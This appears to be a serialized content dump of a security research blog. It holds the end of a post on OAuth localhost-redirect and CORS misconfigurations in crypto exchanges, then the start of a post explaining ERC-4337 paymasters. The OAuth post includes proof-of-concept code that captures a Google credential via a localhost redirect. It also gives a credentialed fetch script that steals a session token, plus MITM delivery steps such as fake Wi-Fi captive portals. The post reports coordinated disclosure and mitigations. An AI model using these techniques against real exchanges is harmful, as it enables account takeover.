3752,103757],{"type":26,"tag":137,"props":103745,"children":103746},{"style":5682},[103747],{"type":32,"value":73558},{"type":26,"tag":137,"props":103749,"children":103750},{"style":5601},[103751],{"type":32,"value":165},{"type":26,"tag":137,"props":103753,"children":103754},{"style":6837},[103755],{"type":32,"value":103756},"\"Test\"",{"type":26,"tag":137,"props":103758,"children":103759},{"style":5601},[103760],{"type":32,"value":5742},{"type":26,"tag":137,"props":103762,"children":103763},{"class":5559,"line":6433},[103764,103768],{"type":26,"tag":137,"props":103765,"children":103766},{"style":5682},[103767],{"type":32,"value":73624},{"type":26,"tag":137,"props":103769,"children":103770},{"style":5601},[103771],{"type":32,"value":5875},{"type":26,"tag":137,"props":103773,"children":103774},{"class":5559,"line":6441},[103775,103780,103784],{"type":26,"tag":137,"props":103776,"children":103777},{"style":5601},[103778],{"type":32,"value":103779},"                                src ",{"type":26,"tag":137,"props":103781,"children":103782},{"style":5590},[103783],{"type":32,"value":289},{"type":26,"tag":137,"props":103785,"children":103786},{"style":6837},[103787],{"type":32,"value":103788}," \"https://accounts.google.com/gsi/client\"\n",{"type":26,"tag":137,"props":103790,"children":103791},{"class":5559,"line":6501},[103792,103797,103802,103806,103810],{"type":26,"tag":137,"props":103793,"children":103794},{"style":5601},[103795],{"type":32,"value":103796},"                                attributes[",{"type":26,"tag":137,"props":103798,"children":103799},{"style":6837},[103800],{"type":32,"value":103801},"\"async\"",{"type":26,"tag":137,"props":103803,"children":103804},{"style":5601},[103805],{"type":32,"value":11247},{"type":26,"tag":137,"props":103807,"children":103808},{"style":5590},[103809],{"type":32,"value":289},{"type":26,"tag":137,"props":103811,"children":103812},{"style":6837},[103813],{"type":32,"value":103814}," \"\"\n",{"type":26,"tag":137,"props":103816,"children":103817},{"class":5559,"line":11634},[103818,103822,103827,103831,103835],{"type":26,"tag":137,"props":103819,"children":103820},{"style":5601},[103821],{"type":32,"value":103796},{"type":26,"tag":137,"props":103823,"children":103824},{"style":6837},[103825],{"type":32,"value":103826},"\"defer\"",{"type":26,"tag":137,"props":103828,"children":103829},{"style":5601},[103830],{"type":32,"value":11247},{"type":26,"tag":137,"props":103832,"children":103833},{"style":5590},[103834],{"type":32,"value":289},{"type":26,"tag":137,"props":103836,"children":103837},{"style":6837},[103838],{"type":32,"value":103814},{"type":26,"tag":137,"props":103840,"children":103841},{"class":5559,"line":11652},[103842],{"type":26,"tag":137,"props":103843,"children":103844},{"style":5601},[103845],{"type":32,"value":73649},{"type":26,"tag":137,"props":103847,"children":103848},{"class":5559,"line":11697},[103849,103853],{"type":26,"tag":137,"props":103850,"children":103851},{"style":5682},[103852],{"type":32,"value":73624},{"type":26,"tag":137,"props":103854,"children":103855},{"style":5601},[103856],{"type":32,"value":5875},{"type":26,"tag":137,"props":103858,"children":103859},{"class":5559,"line":11803},[103860,103865],{"type":26,"tag":137,"props":103861,"children":103862},{"style":5682},[103863],{"type":32,"value":103864},"                                unsafe",{"type":26,"tag":137,"props":103866,"children":103867},{"style":5601},[103868],{"type":32,"value":5875},{"type":26,"tag":137,"props":103870,"children":103871},{"class":5559,"line":26089},[103872,103877],{"type":26,"tag":137,"props":103873,"children":103874},{"style":5590},[103875],{"type":32,"value":103876},"                                    +",{"type":26,"tag":137,"props":103878,"children":103879},{"style":6837},[103880],{"type":32,"value":103881},"\"\"\"\n",{"type":26,"tag":137,"props":103883,"children":103884},{"class":5559,"line":26124},[103885],{"type":26,"tag":137,"props":103886,"children":103887},{"style":6837},[103888],{"type":32,"value":103889},"    function handleCredentialResponse(response) {\n",{"type":26,"tag":137,"props":103891,"children":103892},{"class":5559,"line":26132},[103893],{"type":26,"tag":137,"props":103894,"children":103895},{"style":6837},[103896],{"type":32,"value":103897},"      alert(\"credential: \" + response.credential);\n",{"type":26,"tag":137,"props":103899,"children":103900},{"class":5559,"line":26140},[103901],{"type":26,"tag":137,"props":103902,"children":103903},{"style":6837},[103904],{"type":32,"value":5945},{"type":26,"tag":137,"props":103906,"children":103907},{"class":5559,"line":26149},[103908],{"type":26,"tag":137,"props":103909,"children":103910},{"emptyLinePlaceholder":18},[103911],{"type":32,"value":6276},{"type":26,"tag":137,"props":103913,"children":103914},{"class":5559,"line":26191},[103915],{"type":26,"tag":137,"props":103916,"children":103917},{"style":6837},[103918],{"type":32,"value":103919},"    window.onload = async function () {\n",{"type":26,"tag":137,"props":103921,"children":103922},{"class":5559,"line":26224},[103923],{"type":26,"tag":137,"props":103924,"children":103925},{"style":6837},[103926],{"type":32,"value":103927},"      const oauth_url = new URL(`https://accounts.google.com/o/oauth2/v2/auth/oauthchooseaccount?as=uolEFCMgoGJXBVuGdJja0XdzjrWqOE6iFaK1SBNY9Zk&client_id=redacted&scope=openid%20email%20profile&response_type=id_token&gsiwebsdk=gis_attributes&redirect_uri=http%3A%2F%2Flocalhost%3A3000&response_mode=form_post&origin=http%3A%2F%2Flocalhost%3A3000&display=popup&prompt=select_account&gis_params=ChFodHRwczovL2F6Yml0LmNvbRIRaHR0cHM6Ly9hemJpdC5jb20YByordW9sRUZDTWdvR0pYQlZ1R2RKamEwWGR6anJXcU9FNmlGYUsxU0JOWTlaazJINzE3OTQyNTg0NjQyLXVrb25tbDZkNXM0MjJrZWVpa2RmMTJwdnV1aG1sOWYyLmFwcHMuZ29vZ2xldXNlcmNvbnRlbnQuY29tOAFCQDI0NDlkNGMwMTI3NDQxNGRlMzg5YjFlYjE1MzFmYTAxYTdjM2M5MTFhOTMxNzIxNGJhZTFmODkzNjE2MzIxZDA&service=lso&o2v=1&flowName=GeneralOAuthFlow`);\n",{"type":26,"tag":137,"props":103929,"children":103930},{"class":5559,"line":26232},[103931],{"type":26,"tag":137,"props":103932,"children":103933},{"style":6837},[103934],{"type":32,"value":103935},"      const client_id = oauth_url.searchParams.get(\"client_id\");\n",{"type":26,"tag":137,"props":103937,"children":103938},{"class":5559,"line":26240},[103939],{"type":26,"tag":137,"props":103940,"children":103941},{"style":6837},[103942],{"type":32,"value":103943},"      google.accounts.id.initialize({\n",{"type":26,"tag":137,"props":103945,"children":103946},{"class":5559,"line":26249},[103947],{"type":26,"tag":137,"props":103948,"children":103949},{"style":6837},[103950],{"type":32,"value":103951},"        client_id: client_id,\n",{"type":26,"tag":137,"props":103953,"children":103954},{"class":5559,"line":26325},[103955],{"type":26,"tag":137,"props":103956,"children":103957},{"style":6837},[103958],{"type":32,"value":103959},"        callback: handleCredentialResponse,\n",{"type":26,"tag":137,"props":103961,"children":103962},{"class":5559,"line":26358},[103963],{"type":26,"tag":137,"props":103964,"children":103965},{"style":6837},[103966],{"type":32,"value":103967},"        auto_select: true\n",{"type":26,"tag":137,"props":103969,"children":103970},{"class":5559,"line":26366},[103971],{"type":26,"tag":137,"props":103972,"children":103973},{"style":6837},[103974],{"type":32,"value":9880},{"type":26,"tag":137,"props":103976,"children":103977},{"class":5559,"line":26374},[103978],{"type":26,"tag":137,"props":103979,"children":103980},{"emptyLinePlaceholder":18},[103981],{"type":32,"value":6276},{"type":26,"tag":137,"props":103983,"children":103984},{"class":5559,"line":26411},[103985],{"type":26,"tag":137,"props":103986,"children":103987},{"style":6837},[103988],{"type":32,"value":103989},"      google.accounts.id.renderButton(\n",{"type":26,"tag":137,"props":103991,"children":103992},{"class":5559,"line":26424},[103993],{"type":26,"tag":137,"props":103994,"children":103995},{"style":6837},[103996],{"type":32,"value":103997},"        document.getElementById(\"g_id_signin\"),\n",{"type":26,"tag":137,"props":103999,"children":104000},{"class":5559,"line":26437},[104001],{"type":26,"tag":137,"props":104002,"children":104003},{"style":6837},[104004],{"type":32,"value":104005},"        { theme: \"outline\", size: \"large\" }\n",{"type":26,"tag":137,"props":104007,"children":104008},{"class":5559,"line":26450},[104009],{"type":26,"tag":137,"props":104010,"children":104011},{"style":6837},[104012],{"type":32,"value":9350},{"type":26,"tag":137,"props":104014,"children":104015},{"class":5559,"line":26504},[104016],{"type":26,"tag":137,"props":104017,"children":104018},{"emptyLinePlaceholder":18},[104019],{"type":32,"value":6276},{"type":26,"tag":137,"props":104021,"children":104022},{"class":5559,"line":26513},[104023],{"type":26,"tag":137,"props":104024,"children":104025},{"style":6837},[104026],{"type":32,"value":104027},"      google.accounts.id.prompt();\n",{"type":26,"tag":137,"props":104029,"children":104030},{"class":5559,"line":34876},[104031],{"type":26,"tag":137,"props":104032,"children":104033},{"style":6837},[104034],{"type":32,"value":41593},{"type":26,"tag":137,"props":104036,"children":104037},{"class":5559,"line":34897},[104038,104043,104047,104052],{"type":26,"tag":137,"props":104039,"children":104040},{"style":6837},[104041],{"type":32,"value":104042},"                                    \"\"\"",{"type":26,"tag":137,"props":104044,"children":104045},{"style":5601},[104046],{"type":32,"value":470},{"type":26,"tag":137,"props":104048,"children":104049},{"style":5682},[104050],{"type":32,"value":104051},"trimIndent",{"type":26,"tag":137,"props":104053,"children":104054},{"style":5601},[104055],{"type":32,"value":10320},{"type":26,"tag":137,"props":104057,"children":104058},{"class":5559,"line":83553},[104059],{"type":26,"tag":137,"props":104060,"children":104061},{"style":5601},[104062],{"type":32,"value":104063},"                                }\n",{"type":26,"tag":137,"props":104065,"children":104066},{"class":5559,"line":83566},[104067],{"type":26,"tag":137,"props":104068,"children":104069},{"style":5601},[104070],{"type":32,"value":73649},{"type":26,"tag":137,"props":104072,"children":104073},{"class":5559,"line":83574},[104074],{"type":26,"tag":137,"props":104075,"children":104076},{"style":5601},[104077],{"type":32,"value":73579},{"type":26,"tag":137,"props":104079,"children":104080},{"class":5559,"line":83582},[104081,104085],{"type":26,"tag":137,"props":104082,"children":104083},{"style":5682},[104084],{"type":32,"value":73587},{"type":26,"tag":137,"props":104086,"children":104087},{"style":5601},[104088],{"type":32,"value":5875},{"type":26,"tag":137,"props":104090,"children":104091},{"class":5559,"line":83590},[104092,104096,104100,104104,104109],{"type":26,"tag":137,"props":104093,"children":104094},{"style":5682},[104095],{"type":32,"value":73599},{"type":26,"tag":137,"props":104097,"children":104098},{"style":5601},[104099],{"type":32,"value":12175},{"type":26,"tag":137,"props":104101,"children":104102},{"style":5590},[104103],{"type":32,"value":356},{"type":26,"tag":137,"props":104105,"children":104106},{"style":6837},[104107],{"type":32,"value":104108},"\"Login here:\"",{"type":26,"tag":137,"props":104110,"children":104111},{"style":5601},[104112],{"type":32,"value":12185},{"type":26,"tag":137,"props":104114,"children":104115},{"class":5559,"line":83630},[104116,104121],{"type":26,"tag":137,"props":104117,"children":104118},{"style":5682},[104119],{"type":32,"value":104120},"                            div",{"type":26,"tag":137,"props":104122,"children":104123},{"style":5601},[104124],{"type":32,"value":5875},{"type":26,"tag":137,"props":104126,"children":104127},{"class":5559,"line":83638},[104128,104133,104137],{"type":26,"tag":137,"props":104129,"children":104130},{"style":5601},[104131],{"type":32,"value":104132},"                                id ",{"type":26,"tag":137,"props":104134,"children":104135},{"style":5590},[104136],{"type":32,"value":289},{"type":26,"tag":137,"props":104138,"children":104139},{"style":6837},[104140],{"type":32,"value":104141}," \"g_id_signin\"\n",{"type":26,"tag":137,"props":104143,"children":104144},{"class":5559,"line":90825},[104145],{"type":26,"tag":137,"props":104146,"children":104147},{"style":5601},[104148],{"type":32,"value":73649},{"type":26,"tag":137,"props":104150,"children":104151},{"class":5559,"line":90833},[104152],{"type":26,"tag":137,"props":104153,"children":104154},{"style":5601},[104155],{"type":32,"value":73579},{"type":26,"tag":137,"props":104157,"children":104159},{"class":5559,"line":104158},62,[104160],{"type":26,"tag":137,"props":104161,"children":104162},{"style":5601},[104163],{"type":32,"value":73664},{"type":26,"tag":137,"props":104165,"children":104167},{"class":5559,"line":104166},63,[104168],{"type":26,"tag":137,"props":104169,"children":104170},{"style":5601},[104171],{"type":32,"value":73672},{"type":26,"tag":137,"props":104173,"children":104175},{"class":5559,"line":104174},64,[104176],{"type":26,"tag":137,"props":104177,"children":104178},{"style":5601},[104179],{"type":32,"value":61486},{"type":26,"tag":137,"props":104181,"children":104183},{"class":5559,"line":104182},65,[104184,104188,104192,104196,104200,104204],{"type":26,"tag":137,"props":104185,"children":104186},{"style":5601},[104187],{"type":32,"value":73687},{"type":26,"tag":137,"props":104189,"children":104190},{"style":5682},[104191],{"type":32,"value":73692},{"type":26,"tag":137,"props":104193,"children":104194},{"style":5601},[104195],{"type":32,"value":73697},{"type":26,"tag":137,"props":104197,"children":104198},{"style":5590},[104199],{"type":32,"value":289},{"type":26,"tag":137,"props":104201,"children":104202},{"style":5573},[104203],{"type":32,"value":15060},{"type":26,"tag":137,"props":104205,"children":104206},{"style":5601},[104207],{"type":32,"value":5742},{"type":26,"tag":137,"props":104209,"children":104211},{"class":5559,"line":104210},66,[104212],{"type":26,"tag":137,"props":104213,"children":104214},{"style":5601},[104215],{"type":32,"value":5945},{"type":26,"tag":35,"props":104217,"children":104218},{},[104219],{"type":32,"value":104220},"We also reported this vulnerability to the Web3Auth mobile SDK, Slush Wallet, Kukai Wallet, and several other web3 platforms. As mentioned earlier, this issue could have allowed account takeover with zero user interaction if the user had installed an application that exploited the localhost redirect.",{"type":26,"tag":35,"props":104222,"children":104223},{},[104224],{"type":32,"value":104225},"Each team responded promptly, communicated clearly, and shipped fixes quickly. Their diligence set a strong example for coordinated response and helped ensure user security across the ecosystem.",{"type":26,"tag":118,"props":104227,"children":104229},{"id":104228},"how-to-mitigate",[104230],{"type":32,"value":104231},"How to Mitigate",{"type":26,"tag":35,"props":104233,"children":104234},{},[104235],{"type":32,"value":104236},"The proper way to mitigate this issue is to disallow localhost in the live environment. Developers should have a separate staging OAuth environment with a different client ID for testing purposes. It's important to ensure that tokens generated using the test client ID are not valid in the live environment.",{"type":26,"tag":92,"props":104238,"children":104240},{"id":104239},"exploiting-cors",[104241],{"type":32,"value":104242},"Exploiting CORS",{"type":26,"tag":35,"props":104244,"children":104245},{},[104246],{"type":32,"value":104247},"Another bug we found during our research was related to CORS misconfiguration and how different browsers handle mixed content requests.",{"type":26,"tag":35,"props":104249,"children":104250},{},[104251,104253,104259],{"type":32,"value":104252},"While checking for other bugs in exchanges, we found a CORS (Cross-Origin Resource Sharing) configuration allowing credentials and ",{"type":26,"tag":130,"props":104254,"children":104256},{"className":104255},[],[104257],{"type":32,"value":104258},"http://",{"type":32,"value":104260}," schema for any subdomain:",{"type":26,"tag":5512,"props":104262,"children":104266},{"className":104263,"code":104264,"language":104265,"meta":7,"style":7},"language-http shiki shiki-themes slack-dark","HTTP 200 OK\nAccess-Control-Allow-Origin: http://aa.exchange.com\nAccess-Control-Allow-Credentials: true\n[...]\n","http",[104267],{"type":26,"tag":130,"props":104268,"children":104269},{"__ignoreMap":7},[104270,104278,104286,104294],{"type":26,"tag":137,"props":104271,"children":104272},{"class":5559,"line":5560},[104273],{"type":26,"tag":137,"props":104274,"children":104275},{},[104276],{"type":32,"value":104277},"HTTP 200 OK\n",{"type":26,"tag":137,"props":104279,"children":104280},{"class":5559,"line":5412},[104281],{"type":26,"tag":137,"props":104282,"children":104283},{},[104284],{"type":32,"value":104285},"Access-Control-Allow-Origin: http://aa.exchange.com\n",{"type":26,"tag":137,"props":104287,"children":104288},{"class":5559,"line":5417},[104289],{"type":26,"tag":137,"props":104290,"children":104291},{},[104292],{"type":32,"value":104293},"Access-Control-Allow-Credentials: true\n",{"type":26,"tag":137,"props":104295,"children":104296},{"class":5559,"line":5642},[104297],{"type":26,"tag":137,"props":104298,"children":104299},{},[104300],{"type":32,"value":12908},{"type":26,"tag":118,"props":104302,"children":104304},{"id":104303},"cors-misconfiguration-by-lack-of-tls",[104305],{"type":32,"value":104306},"CORS Misconfiguration by Lack of TLS",{"type":26,"tag":35,"props":104308,"children":104309},{},[104310,104312,104318],{"type":32,"value":104311},"This case requires specific preconditions. The idea is to redirect the user to an insecure subdomain of ",{"type":26,"tag":130,"props":104313,"children":104315},{"className":104314},[],[104316],{"type":32,"value":104317},"exchange.com",{"type":32,"value":104319}," and spoof the response by intercepting and tampering with the victim's network packets.",{"type":26,"tag":35,"props":104321,"children":104322},{},[104323],{"type":32,"value":104324},"However, while testing it by simulating an MITM attack, we figured out that this type of attack behaves differently amongst the main browsers:",{"type":26,"tag":3426,"props":104326,"children":104327},{},[104328,104348],{"type":26,"tag":3430,"props":104329,"children":104330},{},[104331,104333,104338,104340,104346],{"type":32,"value":104332},"Chrome --> won't work because cookies are not sent in ",{"type":26,"tag":130,"props":104334,"children":104336},{"className":104335},[],[104337],{"type":32,"value":104258},{"type":32,"value":104339}," --> ",{"type":26,"tag":130,"props":104341,"children":104343},{"className":104342},[],[104344],{"type":32,"value":104345},"https://",{"type":32,"value":104347}," requests, even if same-site",{"type":26,"tag":3430,"props":104349,"children":104350},{},[104351,104353],{"type":32,"value":104352},"Firefox and Safari --> works since cookies are sent from an insecure context ",{"type":26,"tag":130,"props":104354,"children":104356},{"className":104355},[],[104357],{"type":32,"value":40361},{"type":26,"tag":118,"props":104359,"children":104361},{"id":104360},"exploit-1",[104362],{"type":32,"value":102692},{"type":26,"tag":35,"props":104364,"children":104365},{},[104366],{"type":32,"value":104367},"To exploit it, we must follow some steps:",{"type":26,"tag":4820,"props":104369,"children":104370},{},[104371,104376,104381],{"type":26,"tag":3430,"props":104372,"children":104373},{},[104374],{"type":32,"value":104375},"Force the victim to enter an insecure webpage in the exchange subdomain",{"type":26,"tag":3430,"props":104377,"children":104378},{},[104379],{"type":32,"value":104380},"Deliver the malicious script to the victim using MITM (Man-In-The-Middle)",{"type":26,"tag":3430,"props":104382,"children":104383},{},[104384,104386,104391],{"type":32,"value":104385},"Use ",{"type":26,"tag":130,"props":104387,"children":104389},{"className":104388},[],[104390],{"type":32,"value":40361},{"type":32,"value":104392}," with CORS to do something malicious using the victim's account",{"type":26,"tag":35,"props":104394,"children":104395},{},[104396],{"type":32,"value":104397},"To exploit the CORS issue, an attacker must first get the victim to load an insecure subdomain. This can be achieved through techniques such as spoofing Wi-Fi or creating a fake public network that automatically opens the insecure page as the captive portal.",{"type":26,"tag":35,"props":104399,"children":104400},{},[104401,104403,104408],{"type":32,"value":104402},"Once the redirect to the ",{"type":26,"tag":130,"props":104404,"children":104406},{"className":104405},[],[104407],{"type":32,"value":104258},{"type":32,"value":104409}," website is made, if the attacker is in an adjacent network, it is possible to intercept the HTTP request/response (or DNS resolve) and tamper with the returning page. The returning page should have a malicious script that exploits the CORS misconfiguration:",{"type":26,"tag":5512,"props":104411,"children":104413},{"className":33958,"code":104412,"language":33960,"meta":7,"style":7},"(async () => {\n  let res = await fetch('https://www.exchange.com/api/session_token', {\n    credentials: 'include',\n    method: 'POST',\n  });\n  console.log(await res.json());\n})();\n",[104414],{"type":26,"tag":130,"props":104415,"children":104416},{"__ignoreMap":7},[104417,104440,104477,104494,104511,104518,104559],{"type":26,"tag":137,"props":104418,"children":104419},{"class":5559,"line":5560},[104420,104424,104428,104432,104436],{"type":26,"tag":137,"props":104421,"children":104422},{"style":5601},[104423],{"type":32,"value":165},{"type":26,"tag":137,"props":104425,"children":104426},{"style":5573},[104427],{"type":32,"value":38741},{"type":26,"tag":137,"props":104429,"children":104430},{"style":5601},[104431],{"type":32,"value":42293},{"type":26,"tag":137,"props":104433,"children":104434},{"style":5573},[104435],{"type":32,"value":17413},{"type":26,"tag":137,"props":104437,"children":104438},{"style":5601},[104439],{"type":32,"value":5875},{"type":26,"tag":137,"props":104441,"children":104442},{"class":5559,"line":5412},[104443,104447,104452,104456,104460,104464,104468,104473],{"type":26,"tag":137,"props":104444,"children":104445},{"style":5573},[104446],{"type":32,"value":10440},{"type":26,"tag":137,"props":104448,"children":104449},{"style":5584},[104450],{"type":32,"value":104451}," res",{"type":26,"tag":137,"props":104453,"children":104454},{"style":5590},[104455],{"type":32,"value":5593},{"type":26,"tag":137,"props":104457,"children":104458},{"style":5610},[104459],{"type":32,"value":38807},{"type":26,"tag":137,"props":104461,"children":104462},{"style":5682},[104463],{"type":32,"value":35525},{"type":26,"tag":137,"props":104465,"children":104466},{"style":5601},[104467],{"type":32,"value":165},{"type":26,"tag":137,"props":104469,"children":104470},{"style":6837},[104471],{"type":32,"value":104472},"'https://www.exchange.com/api/session_token'",{"type":26,"tag":137,"props":104474,"children":104475},{"style":5601},[104476],{"type":32,"value":51484},{"type":26,"tag":137,"props":104478,"children":104479},{"class":5559,"line":5417},[104480,104485,104490],{"type":26,"tag":137,"props":104481,"children":104482},{"style":5584},[104483],{"type":32,"value":104484},"    credentials:",{"type":26,"tag":137,"props":104486,"children":104487},{"style":6837},[104488],{"type":32,"value":104489}," 'include'",{"type":26,"tag":137,"props":104491,"children":104492},{"style":5601},[104493],{"type":32,"value":6099},{"type":26,"tag":137,"props":104495,"children":104496},{"class":5559,"line":5642},[104497,104502,104507],{"type":26,"tag":137,"props":104498,"children":104499},{"style":5584},[104500],{"type":32,"value":104501},"    method:",{"type":26,"tag":137,"props":104503,"children":104504},{"style":6837},[104505],{"type":32,"value":104506}," 'POST'",{"type":26,"tag":137,"props":104508,"children":104509},{"style":5601},[104510],{"type":32,"value":6099},{"type":26,"tag":137,"props":104512,"children":104513},{"class":5559,"line":5745},[104514],{"type":26,"tag":137,"props":104515,"children":104516},{"style":5601},[104517],{"type":32,"value":100775},{"type":26,"tag":137,"props":104519,"children":104520},{"class":5559,"line":5850},[104521,104526,104530,104535,104539,104543,104547,104551,104555],{"type":26,"tag":137,"props":104522,"children":104523},{"style":5584},[104524],{"type":32,"value":104525},"  console",{"type":26,"tag":137,"props":104527,"children":104528},{"style":5601},[104529],{"type":32,"value":470},{"type":26,"tag":137,"props":104531,"children":104532},{"style":5682},[104533],{"type":32,"value":104534},"log",{"type":26,"tag":137,"props":104536,"children":104537},{"style":5601},[104538],{"type":32,"value":165},{"type":26,"tag":137,"props":104540,"children":104541},{"style":5610},[104542],{"type":32,"value":35512},{"type":26,"tag":137,"props":104544,"children":104545},{"style":5584},[104546],{"type":32,"value":104451},{"type":26,"tag":137,"props":104548,"children":104549},{"style":5601},[104550],{"type":32,"value":470},{"type":26,"tag":137,"props":104552,"children":104553},{"style":5682},[104554],{"type":32,"value":36593},{"type":26,"tag":137,"props":104556,"children":104557},{"style":5601},[104558],{"type":32,"value":18016},{"type":26,"tag":137,"props":104560,"children":104561},{"class":5559,"line":5878},[104562],{"type":26,"tag":137,"props":104563,"children":104564},{"style":5601},[104565],{"type":32,"value":104566},"})();\n",{"type":26,"tag":35,"props":104568,"children":104569},{},[104570],{"type":32,"value":104571},"During our research, the misconfiguration we found was in an API with an endpoint to return the session token, so the impact was an account takeover (ATO) with some limitations since exchanges usually have MFA to perform some actions like withdrawing.",{"type":26,"tag":118,"props":104573,"children":104574},{"id":42930},[104575],{"type":32,"value":42933},{"type":26,"tag":35,"props":104577,"children":104578},{},[104579,104581,104586],{"type":32,"value":104580},"As mitigation, it is recommended to remove all ",{"type":26,"tag":130,"props":104582,"children":104584},{"className":104583},[],[104585],{"type":32,"value":104258},{"type":32,"value":104587}," URLs from the CORS configuration, including localhost, since a local web server in a mobile environment can abuse it.",{"type":26,"tag":35,"props":104589,"children":104590},{},[104591],{"type":32,"value":104592},"Also, as additional/alternative remediation, it is possible to configure the HSTS policy to include all subdomains and prevent insecure subdomains from loading in the browser.",{"type":26,"tag":92,"props":104594,"children":104595},{"id":31526},[104596],{"type":32,"value":21540},{"type":26,"tag":35,"props":104598,"children":104599},{},[104600],{"type":32,"value":104601},"In conclusion, our deep dive into authentication and client-side bugs within exchange platforms revealed several vulnerabilities stemming from misconfigurations. These types of attacks show the complexity of securing client-side applications due to the different contexts and environments they can operate in.",{"type":26,"tag":35,"props":104603,"children":104604},{},[104605],{"type":32,"value":104606},"It also demonstrates how development configurations can harm the application's security if they are also used in production. Thus, auditors must always understand in which environments and contexts the application will/can be run in, and ensure that the configurations are not insecure for use in production.",{"type":26,"tag":7949,"props":104608,"children":104609},{},[104610],{"type":32,"value":7953},{"title":7,"searchDepth":5412,"depth":5412,"links":104612},[104613,104618,104623],{"id":102297,"depth":5412,"text":102300,"children":104614},[104615,104616,104617],{"id":102308,"depth":5417,"text":102311},{"id":102665,"depth":5417,"text":102668},{"id":104228,"depth":5417,"text":104231},{"id":104239,"depth":5412,"text":104242,"children":104619},[104620,104621,104622],{"id":104303,"depth":5417,"text":104306},{"id":104360,"depth":5417,"text":102692},{"id":42930,"depth":5417,"text":42933},{"id":31526,"depth":5412,"text":21540},"content:blog:2025-10-16-how-we-broke-exchanges-oauth-misconfigurations.md","blog/2025-10-16-how-we-broke-exchanges-oauth-misconfigurations.md","blog/2025-10-16-how-we-broke-exchanges-oauth-misconfigurations",{"_path":104628,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":104629,"description":104630,"date":104631,"author":104632,"image":104633,"isFeatured":18,"onBlogPage":18,"tags":104635,"body":104638,"_type":5433,"_id":110409,"_source":5435,"_file":110410,"_stem":110411,"_extension":5438},"/blog/2025-12-02-paymasters-evm","ERC-4337 Paymasters: Better UX, Hidden Risks","ERC-4337 paymasters unlock powerful UX by abstracting gas costs, but they also add complexity and subtle bugs. Explore some common pitfalls in real-world implementations and learn how to design production-ready paymasters.","2025-12-02T12:00:00.000Z","nicholas",{"src":104634,"width":16,"height":17},"/posts/paymasters-evm/title.png",[104636,104637],"evm","ERC-4337",{"type":23,"children":104639,"toc":110388},[104640,104644,104655,104660,104665,104670,104676,104682,104687,104692,104698,104703,104731,104737,104742,104749,104754,104764,104769,104795,104801,104821,104827,104847,104855,104886,104919,104928,104940,104965,104977,104990,105033,105039,105072,105171,105190,105213,105218,105224,105252,105399,105404,105431,105437,105449,105461,105470,105505,105510,106995,107023,107044,107049,107061,107070,107075,107093,107116,107121,107127,107180,107186,107219,107254,108078,108114,108150,108216,108249,108747,108800,108812,109376,109445,109472,110094,110136,110163,110175,110236,110255,110289,110294,110299,110304,110308,110313,110348,110374,110379,110384],{"type":26,"tag":27,"props":104641,"children":104642},{"id":31609},[104643],{"type":32,"value":31612},{"type":26,"tag":35,"props":104645,"children":104646},{},[104647,104653],{"type":26,"tag":41,"props":104648,"children":104651},{"href":104649,"rel":104650},"https://docs.erc4337.io/",[45],[104652],{"type":32,"value":104637},{"type":32,"value":104654}," (Account Abstraction) has unlocked a new wave of UX improvements for Ethereum. By decoupling users from EOAs (Externally Owned Accounts), it enables smart contract wallets, gas sponsorships, and flexible authentication mechanisms.",{"type":26,"tag":35,"props":104656,"children":104657},{},[104658],{"type":32,"value":104659},"One of the most powerful features introduced by ERC-4337 is the paymaster, a contract that can sponsor gas fees for users. This allows dApps to deliver seamless, “gasless” experiences where users don’t have to hold ETH to transact.",{"type":26,"tag":35,"props":104661,"children":104662},{},[104663],{"type":32,"value":104664},"However, building a correct paymaster isn’t trivial. We’ve seen many developers trip up on subtle details of the standard, which can cause unexpected behavior or unnecessary complexity.",{"type":26,"tag":35,"props":104666,"children":104667},{},[104668],{"type":32,"value":104669},"In this article, we’ll break down how ERC-4337 works at a high level, zoom in on the paymaster’s role, and walk through the most common pitfalls we’ve observed when implementing paymasters. By the end, you’ll have a clear picture of how to design paymasters that follow best practices and are production-ready.",{"type":26,"tag":27,"props":104671,"children":104673},{"id":104672},"erc4337-overview",[104674],{"type":32,"value":104675},"ERC4337 Overview",{"type":26,"tag":92,"props":104677,"children":104679},{"id":104678},"traditional-eoas-vs-smart-contract-wallets",[104680],{"type":32,"value":104681},"Traditional EOAs vs Smart Contract Wallets",{"type":26,"tag":35,"props":104683,"children":104684},{},[104685],{"type":32,"value":104686},"In Ethereum’s early design, user accounts are Externally Owned Accounts (EOAs), controlled by a private key. When you send a transaction (e.g. token transfer or contract call), your private key signs the transaction, and you must pay gas in ETH. If the key is lost or stolen, you lose access to everything permanently. This setup is simple, but also rigid and risky.",{"type":26,"tag":35,"props":104688,"children":104689},{},[104690],{"type":32,"value":104691},"By contrast, smart contract accounts (or \"smart wallets\") are programmable. They can enforce logic like multiple signatures, spending limits, social recovery, batching, and more, automating many aspects of security and usability.",{"type":26,"tag":92,"props":104693,"children":104695},{"id":104694},"why-erc4337-was-introduced",[104696],{"type":32,"value":104697},"Why ERC‑4337 Was Introduced",{"type":26,"tag":35,"props":104699,"children":104700},{},[104701],{"type":32,"value":104702},"Smart wallets offer powerful features, but Ethereum’s protocol restricts transactions to originate only from EOAs. Previous proposals (e.g. EIP‑2938, EIP‑3074) tried to change the protocol itself, requiring a hard fork. ERC‑4337 achieves account abstraction entirely off‑chain, using higher-layer infrastructure without any changes to Ethereum’s consensus layer. This unlocks key UX improvements:",{"type":26,"tag":3426,"props":104704,"children":104705},{},[104706,104711,104716,104721,104726],{"type":26,"tag":3430,"props":104707,"children":104708},{},[104709],{"type":32,"value":104710},"User recovery for lost keys (e.g. social recovery)",{"type":26,"tag":3430,"props":104712,"children":104713},{},[104714],{"type":32,"value":104715},"Batched or atomic multi-step operations in one flow",{"type":26,"tag":3430,"props":104717,"children":104718},{},[104719],{"type":32,"value":104720},"Paying gas fees with ERC‑20 tokens or via sponsor (gasless UX)",{"type":26,"tag":3430,"props":104722,"children":104723},{},[104724],{"type":32,"value":104725},"Using custom signature schemes or multisig logic",{"type":26,"tag":3430,"props":104727,"children":104728},{},[104729],{"type":32,"value":104730},"Creation and use of smart contract wallets without needing ETH or seed phrase upfront",{"type":26,"tag":92,"props":104732,"children":104734},{"id":104733},"how-erc-4337-works",[104735],{"type":32,"value":104736},"How ERC-4337 Works",{"type":26,"tag":35,"props":104738,"children":104739},{},[104740],{"type":32,"value":104741},"Before diving into each component, let's look at how ERC-4337 works at a high 